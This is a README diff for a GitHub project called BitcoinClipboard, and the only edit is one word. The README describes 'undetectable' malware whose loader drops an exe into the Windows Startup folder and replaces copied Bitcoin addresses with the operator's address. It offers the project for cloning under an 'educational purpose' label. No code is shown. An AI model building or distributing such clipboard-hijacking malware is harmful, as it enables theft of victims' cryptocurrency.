ImpactMagique/BitcoinClipboard/README.md

 # BitcoinClipboard
 BitcoinClipboard is an undectable malware made for educationnal purpose only.
-When you execute the jar file, AmumuLoader which is the "hidden name" of the malware, downloads an exe file to the Startup folder of Windows.
+When you execute the jar file, AmumuLoader which is the "hidden name" of the malware, downloads an exe file at the Startup folder of Windows.
 When the infected user copy a bitcoin adress into his clipboard, the adress changes into your adress.

 You can clone this project easily into any Java IDE.